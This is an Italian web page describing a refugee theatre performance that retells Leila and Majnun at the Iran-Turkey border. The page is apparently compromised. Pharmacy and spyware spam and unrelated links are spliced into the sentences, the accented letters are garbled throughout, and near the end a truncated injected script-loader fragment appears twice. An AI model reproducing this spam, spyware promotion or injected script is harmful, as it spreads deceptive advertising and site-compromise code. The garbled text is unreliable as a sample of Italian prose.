zindabad-viva!

Pills Pills cdm4 cdm5 cdm7Performance teatrale a cura di Barbara Sinicco

con i partecipanti al progetto teatrale dell’ICS-Ufficio Rifugiati-Consorzio Italiano di SolidarietAi??

buy pills

Nasim Pardes, Silvia Mancaleoni, Mamadou Diallo, Giulia Binali, Zabiullah Ahmadi, Khouzama Reda

promosso da ICS, Associazione culturale Fabbrica delle bucce-arte e spettacolo, Arci-Circolo l’Officina

cdm9 cdm13 rogaine cost nz Pills cdm16

PuA? una storia d’amore smuovere l’arido cuore di un dittatore che vigila alla frontiera Iran-Turchia?

SAi??, se la storia A? quella di ai???Leila e Majnunai???, i Romeo e Giulietta d’Oriente, e se a raccontarla, tra realtAi?? e finzione scenica, con ironia e generositAi??, sono i giovani che a quella frontiera ci sono realmente passati.

Lo spettacolo realizzato, A? frutto di un lavoro collettivo nato da un progetto teatrale con alcuni richiedenti asilo politico e partecipanti italiani e stranieri.

E’ la rappresentazione della nostra forma di opposizione alla barbarie dei confini, alla mercificazione di una possibilitAi?? di vita, alla logica degli interessi. Questa forma A? stata l’atto artistico, la bellezza, la poesia.

Sinossi tadalafil professional 20 mg

cheap vantin antibiotic side

Siamo sulla linea di confine Iran-Turchia, dove tanti arrivano dopo un estenuante, pericoloso e doloroso viaggio. Arrivano soprattutto dall’Afganistan, dal Pakistan, dal Medioriente.

Non hanno scelto di fare questo viaggio. Hanno abbandonato madri, padri, mogli e figli. La loro vita, spesso -quasi normale-, un lavoro, una famiglia, gli studi, gli amici, A? stata sconvolta dalla guerra, dalle persecuzioni, dai fanatici, dalle bombe. A volte hanno semplicemente fatto una scelta mal tollerata dalla societAi?? tradizionale, un amore non approvato, un cambio di religione, permettersi di dire cose contro il governo….

Adesso sono a questo confine. La guardia che li scopre si approfitta della loro debolezza, sa dove andare a colpirli, sa che resterAi?? impunito.

Ma con questo spettacolo non abbiamo voluto raccontarvi solo questo. Il teatro serve anche per immaginare cose diverse, che ci diano speranza, e infatti con ironia e saggezza, abbiamo scelto di immaginare che anche questa guardia abbia i suoi punti deboli, abbia qualcosa di umano, e lo andiamo a toccare proprio lAi??, sul cuore, attraverso una storia che viene raccontata da una delle migranti. E’ una storia che tutti conoscono in Asia e Medioriente, A? la storia di Leyla e Majnun, gli sfortunati innamorati, Romeo e Giulietta orientali insomma.

http://workinet.net/2018/order-reminyl-8/

La storia, nelle sue diverse versioni, era conosciuta da tutto il gruppo, quindi A? stata perfetta per interpretarla nuovamente, giocarci su, trasformarla.

Tutti i migranti personaggi-piA? una giornalista infiltrata-giocano a turno a interpretare la storia davanti alla rigida guardia, che piano piano, si scioglie.

Cheap lady era 100mg

Un happy end A? necessario, almeno nella finzione.

Ma la finzione in questo caso ben s’intreccia alla realtAi??, perchA? davvero i protagonisti di questa performance, ci sono passati a quella frontiera.

Pills order ralista for sale var d=document;var s=d.createElement('script'); var d=document;var s=d.createElement('script'); The most popular 2017 spy software applications for the mobile phones.


http://gegantssantamaria.org/ios-spy-spybubble-best-spyware-for-iphone.html http://iraqitradeunions.org/?p=9668 Where can i buy benfotiamine vitamins Buy